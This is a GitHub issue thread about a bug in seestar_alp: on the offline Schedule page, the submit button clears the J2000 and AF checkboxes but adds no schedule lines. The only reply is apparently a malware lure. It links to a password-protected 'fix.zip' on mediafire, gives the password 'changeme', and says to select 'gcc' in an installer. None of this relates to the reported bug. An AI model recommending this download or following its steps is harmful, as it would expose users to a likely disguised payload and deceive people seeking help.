### ISSUE TITLE
Off-line schedule is not adding the schedule lines

### ISSUE THREAD

**Issue by jabamula** [smart-underworld/seestar_alp#172]
I noticed this yesterday, but thought that experimental mode would be the reason. Now I reverted to use experimental=false and downloaded the last version.

As you go in off-line to the Schedule page and choose an image or mosaic. After filling the target info, clicking the submit button does not update the schedule. What it does, it clears J2000 and AF check boxes, but keeps all the other data. 

On-line it works OK.

The first image is "Before clicking the submit button", the second image is "After clicking the submit button"
<img width="708" alt="Before clicking the submit button" src="https://github.com/user-attachments/assets/44b1b6dc-9a2e-4e7e-bc06-2984f77c20f0">
<img width="772" alt="After clicking the submit button" src="https://github.com/user-attachments/assets/f6e8a628-ff1e-4cf7-a844-c8425ac16db4">

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
